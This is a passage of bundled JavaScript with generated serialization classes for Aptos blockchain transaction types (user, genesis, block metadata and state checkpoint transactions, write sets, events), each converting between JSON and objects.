        if (value instanceof $a7ef34a427d74c9c$export$6cc4df55a0d44e53) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$f01b89b84789019c) return value.toJSON();
        throw new Error("Cannot resolve union from AptosUserTransactionPayloadValue");
    };
    return AptosUserTransactionPayload;
}();
var $a7ef34a427d74c9c$export$cdd3c52fd0d91746 = /** @class */ function() {
    function AptosUserTransactionSignature() {}
    AptosUserTransactionSignature.create = function(input) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isInput(input)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.create(input);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isInput(input)) return $a7ef34a427d74c9c$export$55dc148272439b32.create(input);
        if ($a7ef34a427d74c9c$export$a5822950b052cd20.isInput(input)) return $a7ef34a427d74c9c$export$a5822950b052cd20.create(input);
        throw new Error("Cannot resolve union from AptosUserTransactionSignatureInput");
    };
    AptosUserTransactionSignature.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$58622fd9455a8cd7.isJSON(json)) return $a7ef34a427d74c9c$export$58622fd9455a8cd7.fromJSON(json);
        if ($a7ef34a427d74c9c$export$55dc148272439b32.isJSON(json)) return $a7ef34a427d74c9c$export$55dc148272439b32.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a5822950b052cd20.isJSON(json)) return $a7ef34a427d74c9c$export$a5822950b052cd20.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosUserTransactionSignatureJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosUserTransactionSignature.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$58622fd9455a8cd7) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$55dc148272439b32) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a5822950b052cd20) return value.toJSON();
        throw new Error("Cannot resolve union from AptosUserTransactionSignatureValue");
    };
    return AptosUserTransactionSignature;
}();
// $ref: #/components/schemas/TransactionEvent/properties/data
// typeName: TransactionEvent_data
var $a7ef34a427d74c9c$export$9e26e36612e8a0b0 = /** @class */ function() {
    function AptosTransactionEventData() {}
    AptosTransactionEventData.create = function(input) {
        return input;
    };
    AptosTransactionEventData.fromJSON = function(json) {
        return json;
    };
    return AptosTransactionEventData;
}();
var $a7ef34a427d74c9c$export$84111d52922a8045 = /** @class */ function() {
    function AptosTransactionEvent(input) {
        this.guid = $a7ef34a427d74c9c$export$5b391ee68ef91d8e.create(input.guid);
        this.sequenceNumber = input.sequenceNumber;
        this.type = input.type;
        this.data = $a7ef34a427d74c9c$export$9e26e36612e8a0b0.create(input.data);
    }
    AptosTransactionEvent.create = function(input) {
        if (input instanceof AptosTransactionEvent) return input;
        return new AptosTransactionEvent(input);
    };
    AptosTransactionEvent.fromJSON = function(json) {
        var input = {
            guid: $a7ef34a427d74c9c$export$5b391ee68ef91d8e.fromJSON(json.guid),
            sequenceNumber: json.sequence_number,
            type: json.type,
            data: $a7ef34a427d74c9c$export$9e26e36612e8a0b0.fromJSON(json.data)
        };
        return AptosTransactionEvent.create(input);
    };
    AptosTransactionEvent.prototype.toJSON = function() {
        return {
            guid: this.guid.toJSON(),
            sequence_number: this.sequenceNumber,
            type: this.type,
            data: this.data
        };
    };
    return AptosTransactionEvent;
}();
var $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe = /** @class */ function() {
    function AptosUserTransaction(input) {
        this.type = input.type;
        this.version = input.version;
        this.hash = input.hash;
        this.stateChangeHash = input.stateChangeHash;
        this.eventRootHash = input.eventRootHash;
        this.stateCheckpointHash = input.stateCheckpointHash;
        this.gasUsed = input.gasUsed;
        this.success = input.success;
        this.vmStatus = input.vmStatus;
        this.accumulatorRootHash = input.accumulatorRootHash;
        this.changes = input.changes.map(function(item) {
            return $a7ef34a427d74c9c$export$7f1d21131ce1b153.create(item);
        });
        this.sender = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.sender);
        this.sequenceNumber = input.sequenceNumber;
        this.maxGasAmount = input.maxGasAmount;
        this.gasUnitPrice = input.gasUnitPrice;
        this.expirationTimestampSecs = input.expirationTimestampSecs;
        this.payload = $a7ef34a427d74c9c$export$4497006109c4cab0.create(input.payload);
        this.signature = $a7ef34a427d74c9c$export$cdd3c52fd0d91746.create(input.signature);
        this.events = input.events.map(function(item) {
            return $a7ef34a427d74c9c$export$84111d52922a8045.create(item);
        });
        this.timestamp = input.timestamp;
    }
    AptosUserTransaction.create = function(input) {
        if (input instanceof AptosUserTransaction) return input;
        return new AptosUserTransaction(input);
    };
    AptosUserTransaction.fromJSON = function(json) {
        var input = {
            type: json.type,
            version: json.version,
            hash: json.hash,
            stateChangeHash: json.state_change_hash,
            eventRootHash: json.event_root_hash,
            stateCheckpointHash: json.state_checkpoint_hash,
            gasUsed: json.gas_used,
            success: json.success,
            vmStatus: json.vm_status,
            accumulatorRootHash: json.accumulator_root_hash,
            changes: json.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$7f1d21131ce1b153.fromJSON(item);
            }),
            sender: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.sender),
            sequenceNumber: json.sequence_number,
            maxGasAmount: json.max_gas_amount,
            gasUnitPrice: json.gas_unit_price,
            expirationTimestampSecs: json.expiration_timestamp_secs,
            payload: $a7ef34a427d74c9c$export$4497006109c4cab0.fromJSON(json.payload),
            signature: $a7ef34a427d74c9c$export$cdd3c52fd0d91746.fromJSON(json.signature),
            events: json.events.map(function(item) {
                return $a7ef34a427d74c9c$export$84111d52922a8045.fromJSON(item);
            }),
            timestamp: json.timestamp
        };
        return AptosUserTransaction.create(input);
    };
    AptosUserTransaction.isInput = function(input) {
        return input.type === "user_transaction";
    };
    AptosUserTransaction.isJSON = function(json) {
        return json.type === "user_transaction";
    };
    AptosUserTransaction.prototype.toJSON = function() {
        return {
            type: this.type,
            version: this.version,
            hash: this.hash,
            state_change_hash: this.stateChangeHash,
            event_root_hash: this.eventRootHash,
            state_checkpoint_hash: this.stateCheckpointHash,
            gas_used: this.gasUsed,
            success: this.success,
            vm_status: this.vmStatus,
            accumulator_root_hash: this.accumulatorRootHash,
            changes: this.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$7f1d21131ce1b153.toJSON(item);
            }),
            sender: this.sender.toJSON(),
            sequence_number: this.sequenceNumber,
            max_gas_amount: this.maxGasAmount,
            gas_unit_price: this.gasUnitPrice,
            expiration_timestamp_secs: this.expirationTimestampSecs,
            payload: $a7ef34a427d74c9c$export$4497006109c4cab0.toJSON(this.payload),
            signature: $a7ef34a427d74c9c$export$cdd3c52fd0d91746.toJSON(this.signature),
            events: this.events.map(function(item) {
                return item.toJSON();
            }),
            timestamp: this.timestamp
        };
    };
    return AptosUserTransaction;
}();
var $a7ef34a427d74c9c$export$b69aeb96de64f7f9 = /** @class */ function() {
    function AptosGenesisTransactionChangesItem() {}
    AptosGenesisTransactionChangesItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isInput(input)) return $a7ef34a427d74c9c$export$524da76a5356f6df.create(input);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isInput(input)) return $a7ef34a427d74c9c$export$979d9c14f991e192.create(input);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isInput(input)) return $a7ef34a427d74c9c$export$987a952a34863a4e.create(input);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isInput(input)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.create(input);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isInput(input)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.create(input);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isInput(input)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.create(input);
        throw new Error("Cannot resolve union from AptosGenesisTransactionChangesItemInput");
    };
    AptosGenesisTransactionChangesItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isJSON(json)) return $a7ef34a427d74c9c$export$524da76a5356f6df.fromJSON(json);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isJSON(json)) return $a7ef34a427d74c9c$export$979d9c14f991e192.fromJSON(json);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isJSON(json)) return $a7ef34a427d74c9c$export$987a952a34863a4e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isJSON(json)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.fromJSON(json);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isJSON(json)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.fromJSON(json);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isJSON(json)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosGenesisTransactionChangesItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosGenesisTransactionChangesItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$524da76a5356f6df) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$979d9c14f991e192) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$987a952a34863a4e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a7cb78b41f26e6a1) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$34b2c39595f761ce) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$88a63a7f3746e5f8) return value.toJSON();
        throw new Error("Cannot resolve union from AptosGenesisTransactionChangesItemValue");
    };
    return AptosGenesisTransactionChangesItem;
}();
var $a7ef34a427d74c9c$export$8b50c40997a75079 = /** @class */ function() {
    function AptosScriptWriteSet(input) {
        this.type = input.type;
        this.executeAs = input.executeAs;
        this.script = $a7ef34a427d74c9c$export$6cc4df55a0d44e53.create(input.script);
    }
    AptosScriptWriteSet.create = function(input) {
        if (input instanceof AptosScriptWriteSet) return input;
        return new AptosScriptWriteSet(input);
    };
    AptosScriptWriteSet.fromJSON = function(json) {
        var input = {
            type: json.type,
            executeAs: json.execute_as,
            script: $a7ef34a427d74c9c$export$6cc4df55a0d44e53.fromJSON(json.script)
        };
        return AptosScriptWriteSet.create(input);
    };
    AptosScriptWriteSet.isInput = function(input) {
        return input.type === "script_write_set";
    };
    AptosScriptWriteSet.isJSON = function(json) {
        return json.type === "script_write_set";
    };
    AptosScriptWriteSet.prototype.toJSON = function() {
        return {
            type: this.type,
            execute_as: this.executeAs,
            script: this.script.toJSON()
        };
    };
    return AptosScriptWriteSet;
}();
var $a7ef34a427d74c9c$export$60c01b52f8c45368 = /** @class */ function() {
    function AptosDirectWriteSet(input) {
        this.type = input.type;
        this.changes = input.changes;
        this.events = input.events.map(function(item) {
            return $a7ef34a427d74c9c$export$84111d52922a8045.create(item);
        });
    }
    AptosDirectWriteSet.create = function(input) {
        if (input instanceof AptosDirectWriteSet) return input;
        return new AptosDirectWriteSet(input);
    };
    AptosDirectWriteSet.fromJSON = function(json) {
        var input = {
            type: json.type,
            changes: json.changes,
            events: json.events.map(function(item) {
                return $a7ef34a427d74c9c$export$84111d52922a8045.fromJSON(item);
            })
        };
        return AptosDirectWriteSet.create(input);
    };
    AptosDirectWriteSet.isInput = function(input) {
        return input.type === "direct_write_set";
    };
    AptosDirectWriteSet.isJSON = function(json) {
        return json.type === "direct_write_set";
    };
    AptosDirectWriteSet.prototype.toJSON = function() {
        return {
            type: this.type,
            changes: this.changes,
            events: this.events.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosDirectWriteSet;
}();
var $a7ef34a427d74c9c$export$6ac2bc57f0d2605e = /** @class */ function() {
    function AptosWriteSetPayloadWriteSet() {}
    AptosWriteSetPayloadWriteSet.create = function(input) {
        if ($a7ef34a427d74c9c$export$8b50c40997a75079.isInput(input)) return $a7ef34a427d74c9c$export$8b50c40997a75079.create(input);
        if ($a7ef34a427d74c9c$export$60c01b52f8c45368.isInput(input)) return $a7ef34a427d74c9c$export$60c01b52f8c45368.create(input);
        throw new Error("Cannot resolve union from AptosWriteSetPayloadWriteSetInput");
    };
    AptosWriteSetPayloadWriteSet.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$8b50c40997a75079.isJSON(json)) return $a7ef34a427d74c9c$export$8b50c40997a75079.fromJSON(json);
        if ($a7ef34a427d74c9c$export$60c01b52f8c45368.isJSON(json)) return $a7ef34a427d74c9c$export$60c01b52f8c45368.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosWriteSetPayloadWriteSetJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosWriteSetPayloadWriteSet.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$8b50c40997a75079) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$60c01b52f8c45368) return value.toJSON();
        throw new Error("Cannot resolve union from AptosWriteSetPayloadWriteSetValue");
    };
    return AptosWriteSetPayloadWriteSet;
}();
var $a7ef34a427d74c9c$export$1edc64623a54feb7 = /** @class */ function() {
    function AptosWriteSetPayload(input) {
        this.type = input.type;
        this.writeSet = $a7ef34a427d74c9c$export$6ac2bc57f0d2605e.create(input.writeSet);
    }
    AptosWriteSetPayload.create = function(input) {
        if (input instanceof AptosWriteSetPayload) return input;
        return new AptosWriteSetPayload(input);
    };
    AptosWriteSetPayload.fromJSON = function(json) {
        var input = {
            type: json.type,
            writeSet: $a7ef34a427d74c9c$export$6ac2bc57f0d2605e.fromJSON(json.write_set)
        };
        return AptosWriteSetPayload.create(input);
    };
    AptosWriteSetPayload.prototype.toJSON = function() {
        return {
            type: this.type,
            write_set: $a7ef34a427d74c9c$export$6ac2bc57f0d2605e.toJSON(this.writeSet)
        };
    };
    return AptosWriteSetPayload;
}();
var $a7ef34a427d74c9c$export$742231df2dac82cf = /** @class */ function() {
    function AptosGenesisTransaction(input) {
        this.type = input.type;
        this.version = input.version;
        this.hash = input.hash;
        this.stateChangeHash = input.stateChangeHash;
        this.eventRootHash = input.eventRootHash;
        this.stateCheckpointHash = input.stateCheckpointHash;
        this.gasUsed = input.gasUsed;
        this.success = input.success;
        this.vmStatus = input.vmStatus;
        this.accumulatorRootHash = input.accumulatorRootHash;
        this.changes = input.changes.map(function(item) {
            return $a7ef34a427d74c9c$export$b69aeb96de64f7f9.create(item);
        });
        this.payload = $a7ef34a427d74c9c$export$1edc64623a54feb7.create(input.payload);
        this.events = input.events.map(function(item) {
            return $a7ef34a427d74c9c$export$84111d52922a8045.create(item);
        });
    }
    AptosGenesisTransaction.create = function(input) {
        if (input instanceof AptosGenesisTransaction) return input;
        return new AptosGenesisTransaction(input);
    };
    AptosGenesisTransaction.fromJSON = function(json) {
        var input = {
            type: json.type,
            version: json.version,
            hash: json.hash,
            stateChangeHash: json.state_change_hash,
            eventRootHash: json.event_root_hash,
            stateCheckpointHash: json.state_checkpoint_hash,
            gasUsed: json.gas_used,
            success: json.success,
            vmStatus: json.vm_status,
            accumulatorRootHash: json.accumulator_root_hash,
            changes: json.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$b69aeb96de64f7f9.fromJSON(item);
            }),
            payload: $a7ef34a427d74c9c$export$1edc64623a54feb7.fromJSON(json.payload),
            events: json.events.map(function(item) {
                return $a7ef34a427d74c9c$export$84111d52922a8045.fromJSON(item);
            })
        };
        return AptosGenesisTransaction.create(input);
    };
    AptosGenesisTransaction.isInput = function(input) {
        return input.type === "genesis_transaction";
    };
    AptosGenesisTransaction.isJSON = function(json) {
        return json.type === "genesis_transaction";
    };
    AptosGenesisTransaction.prototype.toJSON = function() {
        return {
            type: this.type,
            version: this.version,
            hash: this.hash,
            state_change_hash: this.stateChangeHash,
            event_root_hash: this.eventRootHash,
            state_checkpoint_hash: this.stateCheckpointHash,
            gas_used: this.gasUsed,
            success: this.success,
            vm_status: this.vmStatus,
            accumulator_root_hash: this.accumulatorRootHash,
            changes: this.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$b69aeb96de64f7f9.toJSON(item);
            }),
            payload: this.payload.toJSON(),
            events: this.events.map(function(item) {
                return item.toJSON();
            })
        };
    };
    return AptosGenesisTransaction;
}();
var $a7ef34a427d74c9c$export$bb3275e33d45c6cd = /** @class */ function() {
    function AptosBlockMetadataTransactionChangesItem() {}
    AptosBlockMetadataTransactionChangesItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isInput(input)) return $a7ef34a427d74c9c$export$524da76a5356f6df.create(input);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isInput(input)) return $a7ef34a427d74c9c$export$979d9c14f991e192.create(input);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isInput(input)) return $a7ef34a427d74c9c$export$987a952a34863a4e.create(input);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isInput(input)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.create(input);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isInput(input)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.create(input);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isInput(input)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.create(input);
        throw new Error("Cannot resolve union from AptosBlockMetadataTransactionChangesItemInput");
    };
    AptosBlockMetadataTransactionChangesItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isJSON(json)) return $a7ef34a427d74c9c$export$524da76a5356f6df.fromJSON(json);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isJSON(json)) return $a7ef34a427d74c9c$export$979d9c14f991e192.fromJSON(json);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isJSON(json)) return $a7ef34a427d74c9c$export$987a952a34863a4e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isJSON(json)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.fromJSON(json);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isJSON(json)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.fromJSON(json);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isJSON(json)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosBlockMetadataTransactionChangesItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosBlockMetadataTransactionChangesItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$524da76a5356f6df) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$979d9c14f991e192) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$987a952a34863a4e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a7cb78b41f26e6a1) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$34b2c39595f761ce) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$88a63a7f3746e5f8) return value.toJSON();
        throw new Error("Cannot resolve union from AptosBlockMetadataTransactionChangesItemValue");
    };
    return AptosBlockMetadataTransactionChangesItem;
}();
var $a7ef34a427d74c9c$export$ea17bcd935bcab90 = /** @class */ function() {
    function AptosBlockMetadataTransaction(input) {
        this.type = input.type;
        this.version = input.version;
        this.hash = input.hash;
        this.stateChangeHash = input.stateChangeHash;
        this.eventRootHash = input.eventRootHash;
        this.stateCheckpointHash = input.stateCheckpointHash;
        this.gasUsed = input.gasUsed;
        this.success = input.success;
        this.vmStatus = input.vmStatus;
        this.accumulatorRootHash = input.accumulatorRootHash;
        this.changes = input.changes.map(function(item) {
            return $a7ef34a427d74c9c$export$bb3275e33d45c6cd.create(item);
        });
        this.id = input.id;
        this.epoch = input.epoch;
        this.round = input.round;
        this.events = input.events.map(function(item) {
            return $a7ef34a427d74c9c$export$84111d52922a8045.create(item);
        });
        this.previousBlockVotesBitvec = input.previousBlockVotesBitvec;
        this.proposer = $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.create(input.proposer);
        this.failedProposerIndices = input.failedProposerIndices;
        this.timestamp = input.timestamp;
    }
    AptosBlockMetadataTransaction.create = function(input) {
        if (input instanceof AptosBlockMetadataTransaction) return input;
        return new AptosBlockMetadataTransaction(input);
    };
    AptosBlockMetadataTransaction.fromJSON = function(json) {
        var input = {
            type: json.type,
            version: json.version,
            hash: json.hash,
            stateChangeHash: json.state_change_hash,
            eventRootHash: json.event_root_hash,
            stateCheckpointHash: json.state_checkpoint_hash,
            gasUsed: json.gas_used,
            success: json.success,
            vmStatus: json.vm_status,
            accumulatorRootHash: json.accumulator_root_hash,
            changes: json.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$bb3275e33d45c6cd.fromJSON(item);
            }),
            id: json.id,
            epoch: json.epoch,
            round: json.round,
            events: json.events.map(function(item) {
                return $a7ef34a427d74c9c$export$84111d52922a8045.fromJSON(item);
            }),
            previousBlockVotesBitvec: json.previous_block_votes_bitvec,
            proposer: $a7ef34a427d74c9c$export$4bf08dd0aef06cf6.fromJSON(json.proposer),
            failedProposerIndices: json.failed_proposer_indices,
            timestamp: json.timestamp
        };
        return AptosBlockMetadataTransaction.create(input);
    };
    AptosBlockMetadataTransaction.isInput = function(input) {
        return input.type === "block_metadata_transaction";
    };
    AptosBlockMetadataTransaction.isJSON = function(json) {
        return json.type === "block_metadata_transaction";
    };
    AptosBlockMetadataTransaction.prototype.toJSON = function() {
        return {
            type: this.type,
            version: this.version,
            hash: this.hash,
            state_change_hash: this.stateChangeHash,
            event_root_hash: this.eventRootHash,
            state_checkpoint_hash: this.stateCheckpointHash,
            gas_used: this.gasUsed,
            success: this.success,
            vm_status: this.vmStatus,
            accumulator_root_hash: this.accumulatorRootHash,
            changes: this.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$bb3275e33d45c6cd.toJSON(item);
            }),
            id: this.id,
            epoch: this.epoch,
            round: this.round,
            events: this.events.map(function(item) {
                return item.toJSON();
            }),
            previous_block_votes_bitvec: this.previousBlockVotesBitvec,
            proposer: this.proposer.toJSON(),
            failed_proposer_indices: this.failedProposerIndices,
            timestamp: this.timestamp
        };
    };
    return AptosBlockMetadataTransaction;
}();
var $a7ef34a427d74c9c$export$634c1fc3d96e2b99 = /** @class */ function() {
    function AptosStateCheckpointTransactionChangesItem() {}
    AptosStateCheckpointTransactionChangesItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isInput(input)) return $a7ef34a427d74c9c$export$524da76a5356f6df.create(input);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isInput(input)) return $a7ef34a427d74c9c$export$979d9c14f991e192.create(input);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isInput(input)) return $a7ef34a427d74c9c$export$987a952a34863a4e.create(input);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isInput(input)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.create(input);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isInput(input)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.create(input);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isInput(input)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.create(input);
        throw new Error("Cannot resolve union from AptosStateCheckpointTransactionChangesItemInput");
    };
    AptosStateCheckpointTransactionChangesItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$524da76a5356f6df.isJSON(json)) return $a7ef34a427d74c9c$export$524da76a5356f6df.fromJSON(json);
        if ($a7ef34a427d74c9c$export$979d9c14f991e192.isJSON(json)) return $a7ef34a427d74c9c$export$979d9c14f991e192.fromJSON(json);
        if ($a7ef34a427d74c9c$export$987a952a34863a4e.isJSON(json)) return $a7ef34a427d74c9c$export$987a952a34863a4e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$a7cb78b41f26e6a1.isJSON(json)) return $a7ef34a427d74c9c$export$a7cb78b41f26e6a1.fromJSON(json);
        if ($a7ef34a427d74c9c$export$34b2c39595f761ce.isJSON(json)) return $a7ef34a427d74c9c$export$34b2c39595f761ce.fromJSON(json);
        if ($a7ef34a427d74c9c$export$88a63a7f3746e5f8.isJSON(json)) return $a7ef34a427d74c9c$export$88a63a7f3746e5f8.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosStateCheckpointTransactionChangesItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosStateCheckpointTransactionChangesItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$524da76a5356f6df) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$979d9c14f991e192) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$987a952a34863a4e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$a7cb78b41f26e6a1) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$34b2c39595f761ce) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$88a63a7f3746e5f8) return value.toJSON();
        throw new Error("Cannot resolve union from AptosStateCheckpointTransactionChangesItemValue");
    };
    return AptosStateCheckpointTransactionChangesItem;
}();
var $a7ef34a427d74c9c$export$235cc53255f74f73 = /** @class */ function() {
    function AptosStateCheckpointTransaction(input) {
        this.type = input.type;
        this.version = input.version;
        this.hash = input.hash;
        this.stateChangeHash = input.stateChangeHash;
        this.eventRootHash = input.eventRootHash;
        this.stateCheckpointHash = input.stateCheckpointHash;
        this.gasUsed = input.gasUsed;
        this.success = input.success;
        this.vmStatus = input.vmStatus;
        this.accumulatorRootHash = input.accumulatorRootHash;
        this.changes = input.changes.map(function(item) {
            return $a7ef34a427d74c9c$export$634c1fc3d96e2b99.create(item);
        });
        this.timestamp = input.timestamp;
    }
    AptosStateCheckpointTransaction.create = function(input) {
        if (input instanceof AptosStateCheckpointTransaction) return input;
        return new AptosStateCheckpointTransaction(input);
    };
    AptosStateCheckpointTransaction.fromJSON = function(json) {
        var input = {
            type: json.type,
            version: json.version,
            hash: json.hash,
            stateChangeHash: json.state_change_hash,
            eventRootHash: json.event_root_hash,
            stateCheckpointHash: json.state_checkpoint_hash,
            gasUsed: json.gas_used,
            success: json.success,
            vmStatus: json.vm_status,
            accumulatorRootHash: json.accumulator_root_hash,
            changes: json.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$634c1fc3d96e2b99.fromJSON(item);
            }),
            timestamp: json.timestamp
        };
        return AptosStateCheckpointTransaction.create(input);
    };
    AptosStateCheckpointTransaction.isInput = function(input) {
        return input.type === "state_checkpoint_transaction";
    };
    AptosStateCheckpointTransaction.isJSON = function(json) {
        return json.type === "state_checkpoint_transaction";
    };
    AptosStateCheckpointTransaction.prototype.toJSON = function() {
        return {
            type: this.type,
            version: this.version,
            hash: this.hash,
            state_change_hash: this.stateChangeHash,
            event_root_hash: this.eventRootHash,
            state_checkpoint_hash: this.stateCheckpointHash,
            gas_used: this.gasUsed,
            success: this.success,
            vm_status: this.vmStatus,
            accumulator_root_hash: this.accumulatorRootHash,
            changes: this.changes.map(function(item) {
                return $a7ef34a427d74c9c$export$634c1fc3d96e2b99.toJSON(item);
            }),
            timestamp: this.timestamp
        };
    };
    return AptosStateCheckpointTransaction;
}();
var $a7ef34a427d74c9c$export$6ec44d9b97fee83a = /** @class */ function() {
    function AptosGetTransactionsItem() {}
    AptosGetTransactionsItem.create = function(input) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isInput(input)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.create(input);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isInput(input)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.create(input);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isInput(input)) return $a7ef34a427d74c9c$export$742231df2dac82cf.create(input);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isInput(input)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.create(input);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isInput(input)) return $a7ef34a427d74c9c$export$235cc53255f74f73.create(input);
        throw new Error("Cannot resolve union from AptosGetTransactionsItemInput");
    };
    AptosGetTransactionsItem.fromJSON = function(json) {
        if ($a7ef34a427d74c9c$export$a68d05dfc4c2e46e.isJSON(json)) return $a7ef34a427d74c9c$export$a68d05dfc4c2e46e.fromJSON(json);
        if ($a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.isJSON(json)) return $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe.fromJSON(json);
        if ($a7ef34a427d74c9c$export$742231df2dac82cf.isJSON(json)) return $a7ef34a427d74c9c$export$742231df2dac82cf.fromJSON(json);
        if ($a7ef34a427d74c9c$export$ea17bcd935bcab90.isJSON(json)) return $a7ef34a427d74c9c$export$ea17bcd935bcab90.fromJSON(json);
        if ($a7ef34a427d74c9c$export$235cc53255f74f73.isJSON(json)) return $a7ef34a427d74c9c$export$235cc53255f74f73.fromJSON(json);
        var keys = Object.keys(json).join(", ");
        var type = json.type;
        throw new Error("Cannot resolve union from AptosGetTransactionsItemJSON (keys: ".concat(keys, ", type: ").concat(type, ")"));
    };
    AptosGetTransactionsItem.toJSON = function(value) {
        if (value instanceof $a7ef34a427d74c9c$export$a68d05dfc4c2e46e) return value.toJSON();
        if (value instanceof $a7ef34a427d74c9c$export$1b5e2a0f6d08a6fe) return value.toJSON();
